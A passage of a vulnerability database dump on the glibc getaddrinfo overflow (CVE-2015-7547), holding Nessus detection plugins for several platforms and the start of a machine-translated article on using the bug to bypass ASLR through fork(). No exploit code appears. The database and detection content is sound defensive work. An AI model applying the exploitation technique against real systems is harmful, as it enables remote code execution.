service condition\nor the execution of arbitrary code.\");\n # https://www.arista.com/en/support/advisories-notices/security-advisories/1255-security-advisory-17\n script_set_attribute( attribute:\"see_also\", value:\"http://www.nessus.org/u?050a280a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Arista Networks EOS version 4.13.15M / 4.14.12M / 4.15.5M\nor later. Alternatively, apply the patch or recommended mitigation\nreferenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:arista:eos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"arista_eos_detect.nbin\");\n script_require_keys(\"Host/Arista-EOS/Version\");\n\n exit(0);\n}\n\n\ninclude(\"arista_eos_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/Arista-EOS/Version\");\next1=\"2.6.0/2980299.gamiltonsecAdvisory0017Patch.63\";\nsha1=\"16948241511ccf7044a8e1eeef4e55d2181194296ea02e22f2bd6df69a3f25386bf2938f3086f67a148d84d62ede10fc530fbbbd27a58bb49d4c642ecc675690\";\next2=\"glibc-common.i686.rpm 2.13/4Ar\";\nsha2=\"ccdf8ad84ac1a7985d89b026a6a311533a0f028c4a80c9a8fafa9b1ac4386fe169adb15145faea2e8c8f8cc8e9152f42150c9bd7df63b4dbd4612641d9aabded\";\n\nif(eos_extension_installed(ext:ext1, sha:sha1) || eos_extension_installed(ext:ext2, sha:sha2)) \n exit(0, \"The Arista device is not vulnerable, as a relevant hotfix has been installed.\");\n\nvmatrix = make_array();\nvmatrix[\"all\"] = make_list(\"0.0<=4.11.99\");\nvmatrix[\"F\"] = make_list(\"4.13.1.1<=4.13.6\",\n \"4.14.0<=4.14.5\",\n \"4.15.0<=4.15.4\");\n\nvmatrix[\"M\"] = make_list(\"4.13.7<=4.13.14\",\n \"4.14.6<=4.14.11\");\n\nvmatrix[\"misc\"] = make_list(\"4.12.5.2\",\n \"4.12.6.1\",\n \"4.12.7.1\",\n \"4.12.8\", \n \"4.12.8.1\", \n \"4.12.9\", \n \"4.12.10\",\n \"4.12.11\",\n \"4.14.5FX\",\n \"4.14.5FX.1\",\n \"4.14.5FX.2\",\n \"4.14.5FX.3\",\n \"4.14.5FX.4\",\n \"4.14.5.1F-SSU\",\n \"4.15.0FX\",\n \"4.15.0FXA\",\n \"4.15.0FX1\",\n \"4.15.1FXB1\",\n \"4.15.1FXB\",\n \"4.15.1FX-7060X\",\n \"4.15.1FX-7260QX\",\n \"4.15.3FX-7050X-72Q\",\n \"4.15.3FX-7060X.1\",\n \"4.15.3FX-7500E3\",\n \"4.15.3FX-7500E3.3\",\n \"4.15.4FX-7500E3\");\nvmatrix[\"fix\"] = \"Apply one of the vendor supplied patches or upgrade to EOS 4.15.5M /4.14.12M / 4.13.15M or later\";\n\nif (eos_is_affected(vmatrix:vmatrix, version:version))\n{\n security_report_v4(severity:SECURITY_WARNING, port:0, extra:eos_report_get());\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Arista Networks EOS\", version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:50:32", "description": "From Red Hat Security Advisory 2016:0175 :\n\nUpdated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "Oracle Linux 6 : glibc (ELSA-2016-0175)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2016-0175.NASL", "href": "https://www.tenable.com/plugins/nessus/88776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0175 and \n# Oracle Linux Security Advisory ELSA-2016-0175 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88776);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0175\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Oracle Linux 6 : glibc (ELSA-2016-0175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0175 :\n\nUpdated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-February/005782.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T15:21:39", "description": "The remote VMware ESXi host is 5.5 prior to build 3568722 or 6.0\nprior to build 3568940. It is, therefore, affected by a stack-based\nbuffer overflow condition in the GNU C Library (glibc) DNS client-side\nresolver due to improper validation of user-supplied input when\nlooking up names via the getaddrinfo() function. An attacker can\nexploit this to execute arbitrary code by using an attacker-controlled\ndomain name, an attacker-controlled DNS server, or through a\nman-in-the-middle attack.", "edition": 26, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-23T00:00:00", "title": "ESXi 5.5 < Build 3568722 / 6.0 < Build 3568940 glibc DNS Resolver RCE (VMSA-2016-0002) (remote check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-23T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2016-0002_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/88906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88906);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"VMSA\", value:\"2016-0002\");\n script_xref(name:\"CERT\", value:\"457759\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n\n script_name(english:\"ESXi 5.5 < Build 3568722 / 6.0 < Build 3568940 glibc DNS Resolver RCE (VMSA-2016-0002) (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is 5.5 prior to build 3568722 or 6.0\nprior to build 3568940. It is, therefore, affected by a stack-based\nbuffer overflow condition in the GNU C Library (glibc) DNS client-side\nresolver due to improper validation of user-supplied input when\nlooking up names via the getaddrinfo() function. An attacker can\nexploit this to execute arbitrary code by using an attacker-controlled\ndomain name, an attacker-controlled DNS server, or through a\nman-in-the-middle attack.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144353\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144357\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144057\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144054\");\n # https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8bdae0a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=18665\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfixes = make_array(\n '5.5', '3568722',\n '6.0', '3568940'\n );\n\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\n\n# Lets extract the ESXi version\nver = ereg_replace(pattern:\"^ESXi? ([0-9]+\\.[0-9]+).*$\", replace:\"\\1\", string:ver);\n\nif (\n ver !~ '^5\\\\.5($|[^0-9])' &&\n ver !~ '^6\\\\.0($|[^0-9])'\n) audit(AUDIT_OS_NOT, \"ESXi 5.5 / 6.0\");\n\nfixed_build = fixes[ver];\n\n# We should never ever trigger this\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, \"VMware ESXi\", \"5.5 / 6.0\");\n\nbuild = int(match[1]);\n\nif (build < fixed_build)\n{\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi \", ver + \" build \" + build);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:51", "description": "New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.", "edition": 28, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-24T00:00:00", "title": "Slackware 14.1 / current : glibc (SSA:2016-054-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-24T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:glibc-i18n", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:glibc-profile", "p-cpe:/a:slackware:slackware_linux:glibc", "p-cpe:/a:slackware:slackware_linux:glibc-solibs"], "id": "SLACKWARE_SSA_2016-054-02.NASL", "href": "https://www.tenable.com/plugins/nessus/88910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-054-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88910);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"SSA\", value:\"2016-054-02\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Slackware 14.1 / current : glibc (SSA:2016-054-02)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.569827\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b214cba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/24\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"glibc\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-02-21T09:00:48", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "0x01 introduction \n2016 2 on 16 May, Google disclosed a critical buffer overflow vulnerability in the GLIBC library in the getaddrinfo function in the trigger. At the same time they also provided a copy of the PoC. Based on this, in this article, we will show how to by CVE-2015-7547 bypass ASLR. \n0x02 vulnerability description\ngetaddrinfo()function is the role by querying the DNS service, the host name and the server resolves to the addrinfo structure. \n! [](/Article/UploadPic/2017-2/201722018366486. png? www. myhack58. com) \nIn the getaddrinfo()function implementation, use the alloca()function on the stack allocated buffer for DNS responses. The beginning, the function first allocates a section of stack space for the DNS response, if the response time is too long, it will re-allocate a heap buffer for the response. But since the update to the code the buffer to the newly allocated heap buffer, stack of old buffer delay in the release, still use. This dangling pointer will cause a classic buffer overflow. \nASLR? ASLR! \nIn the above case, by this vulnerability cover the getaddrinfo()function's return address, but we should be the return address of the cover to where? When you enable ASLR system, The module address is random. Therefore, the attacker can not be attack stream address is set to the pre-set address. \nfork() \nfork()is Linux create a new process. A typical fork using the method as shown below: \n! [](/Article/UploadPic/2017-2/201722018366945. png? www. myhack58. com) \nfork a child process and the parent process use the same instruction segment, they only have the pid is not the same, and pid is the fork function returns to the child process. And windows under the code multiplexing, the difference is that here means that the child process and its parent processes share many characteristics-have the same register state, stack and memory layout. \n0x03 program flow example\nConsider a server application, its mode of operation is as follows: \n! [](/Article/UploadPic/2017-2/201722018366269. png? www. myhack58. com) \n1\\. Client remote connection to the application. \n2\\. Application your fork a child process for responding to client 